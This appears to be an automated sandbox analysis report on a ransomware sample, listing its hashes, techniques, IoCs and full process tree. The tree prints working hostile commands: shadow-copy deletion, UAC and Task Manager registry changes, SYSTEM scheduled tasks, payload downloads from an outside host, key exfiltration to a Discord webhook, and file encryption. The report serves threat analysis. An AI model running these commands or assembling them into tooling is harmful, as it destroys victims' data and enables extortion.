a84f1837031f236302dc335ea0d285e4c9e223631ae2702a0d6176a743018161

Analysis

max time kernel
115s
max time network
120s
platform
windows7_x64
resource
win7v20201028
submitted
27/02/2021, 14:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BleachGap.bin.exe
Size

1001KB
MD5

015bb16ddcbf8a6326ec859020466c05
SHA1

f0ff1059e64175c8bf3f557cf1b0f49ed105d7d4
SHA256

c1eb88cc7f7b43de1ef71fae416c729483d71fa930314c36dfb03b01b8455d31
SHA512

588051f1702c69b96168c9bfa41bdb9aaffdf48bf3178e30ee1bf1510989a1b43b1032b9b002f81907428182a050befc9b00143b4991c47131bcb4b25dfc83c5

Score

10^/10

evasion ransomware trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Blocklisted process makes network request 3 IoCs

flow	pid	Process
9	1612	powershell.exe
11	232	powershell.exe
27	1836	powershell.exe

Disables Task Manager via registry modification
evasion

Executes dropped EXE 64 IoCs

pid	Process
2032	DiscordSendWebhook.exe
1676	extd.exe
1200	DiscordSendWebhook.exe
884	aescrypt.exe
1532	aescrypt.exe
440	aescrypt.exe
2004	aescrypt.exe
1696	aescrypt.exe
1952	aescrypt.exe
632	aescrypt.exe
1820	aescrypt.exe
2028	aescrypt.exe
216	aescrypt.exe
220	aescrypt.exe
1192	aescrypt.exe
1076	aescrypt.exe
1940	aescrypt.exe
1080	aescrypt.exe
1368	aescrypt.exe
760	aescrypt.exe
228	aescrypt.exe
1128	aescrypt.exe
912	aescrypt.exe
344	aescrypt.exe
1476	aescrypt.exe
324	aescrypt.exe
1540	aescrypt.exe
1176	aescrypt.exe
2040	aescrypt.exe
952	aescrypt.exe
884	aescrypt.exe
1076	aescrypt.exe
1928	aescrypt.exe
1176	aescrypt.exe
892	aescrypt.exe
988	aescrypt.exe
584	aescrypt.exe
1552	aescrypt.exe
664	aescrypt.exe
296	aescrypt.exe
1068	aescrypt.exe
324	aescrypt.exe
1896	aescrypt.exe
1564	aescrypt.exe
2040	aescrypt.exe
1572	aescrypt.exe
960	aescrypt.exe
1952	aescrypt.exe
1696	aescrypt.exe
1576	aescrypt.exe
1276	aescrypt.exe
1192	aescrypt.exe
1184	aescrypt.exe
1352	aescrypt.exe
1616	aescrypt.exe
232	aescrypt.exe
228	aescrypt.exe
816	aescrypt.exe
584	aescrypt.exe
664	aescrypt.exe
1896	aescrypt.exe
1564	aescrypt.exe
216	aescrypt.exe
1572	aescrypt.exe

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File created	C:\Users\Admin\Pictures\DisconnectMeasure.tiff.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\FormatSend.crw.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\OpenEnter.tif.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\ExportGroup.png.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\RenameConnect.tif.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\WatchRename.png.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\EnterRequest.raw.lck	aescrypt.exe
File created	C:\Users\Admin\Pictures\FindAdd.png.lck	aescrypt.exe

Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00030000000130f2-62.dat	upx
behavioral1/files/0x00030000000130f2-64.dat	upx

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.bin.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.bin.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.bin.exe	attrib.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1552	schtasks.exe
788	schtasks.exe
1540	schtasks.exe
2028	schtasks.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
952	vssadmin.exe
2012	vssadmin.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
1464	taskkill.exe
1080	taskkill.exe
1176	taskkill.exe
520	taskkill.exe
1112	taskkill.exe
1972	taskkill.exe
1176	taskkill.exe
1576	taskkill.exe

Opens file in notepad (likely ransom note) 2 IoCs

ransomware

pid	Process
1616	NOTEPAD.EXE
2004	NOTEPAD.EXE

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: CmdExeWriteProcessMemorySpam 64 IoCs

pid	Process
2032	DiscordSendWebhook.exe
1676	extd.exe
1200	DiscordSendWebhook.exe
884	aescrypt.exe
1532	aescrypt.exe
440	aescrypt.exe
2004	aescrypt.exe
1696	aescrypt.exe
1952	aescrypt.exe
632	aescrypt.exe
1820	aescrypt.exe
2028	aescrypt.exe
216	aescrypt.exe
220	aescrypt.exe
1192	aescrypt.exe
1076	aescrypt.exe
1940	aescrypt.exe
1080	aescrypt.exe
1368	aescrypt.exe
760	aescrypt.exe
228	aescrypt.exe
1128	aescrypt.exe
912	aescrypt.exe
344	aescrypt.exe
1476	aescrypt.exe
324	aescrypt.exe
1540	aescrypt.exe
1176	aescrypt.exe
2040	aescrypt.exe
952	aescrypt.exe
884	aescrypt.exe
1076	aescrypt.exe
1928	aescrypt.exe
1176	aescrypt.exe
892	aescrypt.exe
988	aescrypt.exe
584	aescrypt.exe
1552	aescrypt.exe
664	aescrypt.exe
296	aescrypt.exe
1068	aescrypt.exe
324	aescrypt.exe
1896	aescrypt.exe
1564	aescrypt.exe
2040	aescrypt.exe
1572	aescrypt.exe
960	aescrypt.exe
1952	aescrypt.exe
1696	aescrypt.exe
1576	aescrypt.exe
1276	aescrypt.exe
1192	aescrypt.exe
1184	aescrypt.exe
1352	aescrypt.exe
1616	aescrypt.exe
232	aescrypt.exe
228	aescrypt.exe
816	aescrypt.exe
584	aescrypt.exe
664	aescrypt.exe
1896	aescrypt.exe
1564	aescrypt.exe
216	aescrypt.exe
1572	aescrypt.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
1564	powershell.exe
1564	powershell.exe
1612	powershell.exe
1612	powershell.exe
232	powershell.exe
232	powershell.exe
1304	powershell.exe
1304	powershell.exe
988	powershell.exe
988	powershell.exe
1576	powershell.exe
1576	powershell.exe
1192	powershell.exe
1192	powershell.exe
1656	powershell.exe
1656	powershell.exe
1640	powershell.exe
1640	powershell.exe
1076	powershell.exe
1076	powershell.exe
912	powershell.exe
912	powershell.exe
1368	powershell.exe
1368	powershell.exe
1780	aescrypt.exe
1780	aescrypt.exe
584	certutil.exe
584	certutil.exe
1720	powershell.exe
1836	powershell.exe
1720	powershell.exe
1836	powershell.exe
968	powershell.exe
968	powershell.exe
1392	powershell.exe
1392	powershell.exe
752	powershell.exe
752	powershell.exe
1832	powershell.exe
1832	powershell.exe
296	powershell.exe
296	powershell.exe
1068	powershell.exe
1068	powershell.exe
664	powershell.exe
664	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2044	WMIC.exe
Token: SeSecurityPrivilege	2044	WMIC.exe
Token: SeTakeOwnershipPrivilege	2044	WMIC.exe
Token: SeLoadDriverPrivilege	2044	WMIC.exe
Token: SeSystemProfilePrivilege	2044	WMIC.exe
Token: SeSystemtimePrivilege	2044	WMIC.exe
Token: SeProfSingleProcessPrivilege	2044	WMIC.exe
Token: SeIncBasePriorityPrivilege	2044	WMIC.exe
Token: SeCreatePagefilePrivilege	2044	WMIC.exe
Token: SeBackupPrivilege	2044	WMIC.exe
Token: SeRestorePrivilege	2044	WMIC.exe
Token: SeShutdownPrivilege	2044	WMIC.exe
Token: SeDebugPrivilege	2044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2044	WMIC.exe
Token: SeRemoteShutdownPrivilege	2044	WMIC.exe
Token: SeUndockPrivilege	2044	WMIC.exe
Token: SeManageVolumePrivilege	2044	WMIC.exe
Token: 33	2044	WMIC.exe
Token: 34	2044	WMIC.exe
Token: 35	2044	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2044	WMIC.exe
Token: SeSecurityPrivilege	2044	WMIC.exe
Token: SeTakeOwnershipPrivilege	2044	WMIC.exe
Token: SeLoadDriverPrivilege	2044	WMIC.exe
Token: SeSystemProfilePrivilege	2044	WMIC.exe
Token: SeSystemtimePrivilege	2044	WMIC.exe
Token: SeProfSingleProcessPrivilege	2044	WMIC.exe
Token: SeIncBasePriorityPrivilege	2044	WMIC.exe
Token: SeCreatePagefilePrivilege	2044	WMIC.exe
Token: SeBackupPrivilege	2044	WMIC.exe
Token: SeRestorePrivilege	2044	WMIC.exe
Token: SeShutdownPrivilege	2044	WMIC.exe
Token: SeDebugPrivilege	2044	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2044	WMIC.exe
Token: SeRemoteShutdownPrivilege	2044	WMIC.exe
Token: SeUndockPrivilege	2044	WMIC.exe
Token: SeManageVolumePrivilege	2044	WMIC.exe
Token: 33	2044	WMIC.exe
Token: 34	2044	WMIC.exe
Token: 35	2044	WMIC.exe
Token: SeBackupPrivilege	1620	vssvc.exe
Token: SeRestorePrivilege	1620	vssvc.exe
Token: SeAuditPrivilege	1620	vssvc.exe
Token: SeDebugPrivilege	1564	powershell.exe
Token: SeDebugPrivilege	1464	taskkill.exe
Token: SeDebugPrivilege	1080	taskkill.exe
Token: SeDebugPrivilege	1176	taskkill.exe
Token: SeDebugPrivilege	520	taskkill.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	232	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	1192	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	1640	powershell.exe
Token: SeDebugPrivilege	1076	powershell.exe
Token: SeIncreaseQuotaPrivilege	1184	WMIC.exe
Token: SeSecurityPrivilege	1184	WMIC.exe
Token: SeTakeOwnershipPrivilege	1184	WMIC.exe
Token: SeLoadDriverPrivilege	1184	WMIC.exe
Token: SeSystemProfilePrivilege	1184	WMIC.exe
Token: SeSystemtimePrivilege	1184	WMIC.exe
Token: SeProfSingleProcessPrivilege	1184	WMIC.exe

Suspicious use of FindShellTrayWindow 10 IoCs

pid	Process
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe

Suspicious use of SendNotifyMessage 10 IoCs

pid	Process
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
2032	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1200	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe
1952	DiscordSendWebhook.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1108 wrote to memory of 2020	1108	BleachGap.bin.exe	26
PID 1108 wrote to memory of 2020	1108	BleachGap.bin.exe	26
PID 1108 wrote to memory of 2020	1108	BleachGap.bin.exe	26
PID 1108 wrote to memory of 2020	1108	BleachGap.bin.exe	26
PID 2020 wrote to memory of 2044	2020	cmd.exe	28
PID 2020 wrote to memory of 2044	2020	cmd.exe	28
PID 2020 wrote to memory of 2044	2020	cmd.exe	28
PID 2020 wrote to memory of 952	2020	cmd.exe	35
PID 2020 wrote to memory of 952	2020	cmd.exe	35
PID 2020 wrote to memory of 952	2020	cmd.exe	35
PID 2020 wrote to memory of 1068	2020	cmd.exe	36
PID 2020 wrote to memory of 1068	2020	cmd.exe	36
PID 2020 wrote to memory of 1068	2020	cmd.exe	36
PID 2020 wrote to memory of 932	2020	cmd.exe	37
PID 2020 wrote to memory of 932	2020	cmd.exe	37
PID 2020 wrote to memory of 932	2020	cmd.exe	37
PID 2020 wrote to memory of 1484	2020	cmd.exe	38
PID 2020 wrote to memory of 1484	2020	cmd.exe	38
PID 2020 wrote to memory of 1484	2020	cmd.exe	38
PID 2020 wrote to memory of 584	2020	cmd.exe	39
PID 2020 wrote to memory of 584	2020	cmd.exe	39
PID 2020 wrote to memory of 584	2020	cmd.exe	39
PID 2020 wrote to memory of 1540	2020	cmd.exe	40
PID 2020 wrote to memory of 1540	2020	cmd.exe	40
PID 2020 wrote to memory of 1540	2020	cmd.exe	40
PID 2020 wrote to memory of 1552	2020	cmd.exe	41
PID 2020 wrote to memory of 1552	2020	cmd.exe	41
PID 2020 wrote to memory of 1552	2020	cmd.exe	41
PID 2020 wrote to memory of 664	2020	cmd.exe	42
PID 2020 wrote to memory of 664	2020	cmd.exe	42
PID 2020 wrote to memory of 664	2020	cmd.exe	42
PID 2020 wrote to memory of 296	2020	cmd.exe	43
PID 2020 wrote to memory of 296	2020	cmd.exe	43
PID 2020 wrote to memory of 296	2020	cmd.exe	43
PID 2020 wrote to memory of 912	2020	cmd.exe	44
PID 2020 wrote to memory of 912	2020	cmd.exe	44
PID 2020 wrote to memory of 912	2020	cmd.exe	44
PID 2020 wrote to memory of 2032	2020	cmd.exe	45
PID 2020 wrote to memory of 2032	2020	cmd.exe	45
PID 2020 wrote to memory of 2032	2020	cmd.exe	45
PID 2020 wrote to memory of 2032	2020	cmd.exe	45
PID 2020 wrote to memory of 1564	2020	cmd.exe	46
PID 2020 wrote to memory of 1564	2020	cmd.exe	46
PID 2020 wrote to memory of 1564	2020	cmd.exe	46
PID 2020 wrote to memory of 1464	2020	cmd.exe	47
PID 2020 wrote to memory of 1464	2020	cmd.exe	47
PID 2020 wrote to memory of 1464	2020	cmd.exe	47
PID 2020 wrote to memory of 1080	2020	cmd.exe	48
PID 2020 wrote to memory of 1080	2020	cmd.exe	48
PID 2020 wrote to memory of 1080	2020	cmd.exe	48
PID 2020 wrote to memory of 1176	2020	cmd.exe	49
PID 2020 wrote to memory of 1176	2020	cmd.exe	49
PID 2020 wrote to memory of 1176	2020	cmd.exe	49
PID 2020 wrote to memory of 520	2020	cmd.exe	50
PID 2020 wrote to memory of 520	2020	cmd.exe	50
PID 2020 wrote to memory of 520	2020	cmd.exe	50
PID 2020 wrote to memory of 1552	2020	cmd.exe	51
PID 2020 wrote to memory of 1552	2020	cmd.exe	51
PID 2020 wrote to memory of 1552	2020	cmd.exe	51
PID 2020 wrote to memory of 1612	2020	cmd.exe	52
PID 2020 wrote to memory of 1612	2020	cmd.exe	52
PID 2020 wrote to memory of 1612	2020	cmd.exe	52
PID 2020 wrote to memory of 232	2020	cmd.exe	53
PID 2020 wrote to memory of 232	2020	cmd.exe	53

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2028	attrib.exe
664	attrib.exe
296	attrib.exe
912	attrib.exe
528	attrib.exe
1836	attrib.exe
1928	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe
"C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1108
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\21F2.tmp\21F3.tmp\21F4.bat C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe"
  2⤵
  - Drops startup file
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:952
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
    3⤵
    PID:1068
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
    3⤵
    PID:932
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
    3⤵
    PID:1484
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
    3⤵
    PID:584
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
    3⤵
    PID:1540
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d "1" /f
    3⤵
    PID:1552
- - C:\Windows\system32\attrib.exe
    attrib +r +s +h +a +i C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe
    3⤵
    - Views/modifies file attributes
    PID:664
- - C:\Windows\system32\attrib.exe
    attrib +r +a +s +h +i "C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe"
    3⤵
    - Views/modifies file attributes
    PID:296
- - C:\Windows\system32\attrib.exe
    attrib +r +a +s +h +i "C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook.exe"
    3⤵
    - Views/modifies file attributes
    PID:912
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook.exe
    "C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook" -m ":writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell start -verb runas cmd.exe /ArgumentList "/c kill.bat" /filepath "C:\Users\Admin\AppData\Local\Temp" /WindowStyle hidden
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1464
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1080
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1176
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:520
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\BleachGap.bin.exe" /RU "SYSTEM" /f
    3⤵
    - Creates scheduled task(s)
    PID:1552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c (new-object System.Net.WebClient).DownloadFile('https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe','C:\Users\Admin\AppData\Local\Temp\final.exe')
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c Invoke-WebRequest -Uri https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe -OutFile C:\Users\Admin\AppData\Local\Temp\final.exe
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:232
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe C:\Users\Admin\AppData\Local\Temp\final.exe
    3⤵
    PID:1016
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\21F3.tmp\extd.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\21F3.tmp\extd.exe "/download" "https://cdn-115.anonfiles.com/9821W1G5p3/542b7e19-1612884386/gameover.exe" "C:\Users\Admin\AppData\Local\Temp\final.exe" "" "" "" "" "" ""
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1676
- - C:\Windows\system32\schtasks.exe
    schtasks /create /sc DAILY /tn UpdateWuaucltHelper /rl highest /tr "C:\Users\Admin\AppData\Local\Temp\final.exe" /RU "SYSTEM" /MO 5
    3⤵
    - Creates scheduled task(s)
    PID:788
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook.exe
    "C:\Users\Admin\AppData\Local\Temp\21F2.tmp\DiscordSendWebhook" -m ":satellite: New Crypt from Admin, Password: aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj, FakeAccount: zHEuUzVPUyDp4d4f3pMK433N9kxuw0tAoB7, PersonalKey:||LeL5o5LxijTSrVwoFrRm0QXa25DC1nhhBcDX||" -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1200
- - C:\Windows\system32\attrib.exe
    attrib +r +a +s +h +i C:\Users\Admin\AppData\Local\Temp /s /D
    3⤵
    - Views/modifies file attributes
    PID:528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c dir * /a-D /b /oS
    3⤵
    PID:304
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "desktop.ini.lck" "desktop.ini"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:884
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ImportBlock.doc.lck" "ImportBlock.doc"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1532
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "InvokeTrace.mpeg.lck" "InvokeTrace.mpeg"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:440
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "UnpublishUnlock.asp.lck" "UnpublishUnlock.asp"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2004
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "NewCopy.wdp.lck" "NewCopy.wdp"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1696
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CheckpointBackup.svgz.lck" "CheckpointBackup.svgz"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "CheckpointDismount.odt.lck" "CheckpointDismount.odt"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:632
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RestoreEdit.ppsm.lck" "RestoreEdit.ppsm"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1820
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "RequestLimit.mpeg3.lck" "RequestLimit.mpeg3"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2028
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BackupSubmit.ini.lck" "BackupSubmit.ini"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:216
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "BlockStep.snd.lck" "BlockStep.snd"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "SaveProtect.txt.lck" "SaveProtect.txt"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1192
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "DisconnectSync.wax.lck" "DisconnectSync.wax"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1076
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "ReceiveSwitch.htm.lck" "ReceiveSwitch.htm"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1940
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
    C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe -e -p aeBUcgKnwPUgxVd6du0c1ykM8XTmB8bj -o "FormatMerge.mpeg3.lck" "FormatMerge.mpeg3"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1080
- - C:\Users\Admin\AppData\Local\Temp\21F2.tmp\aescrypt.exe
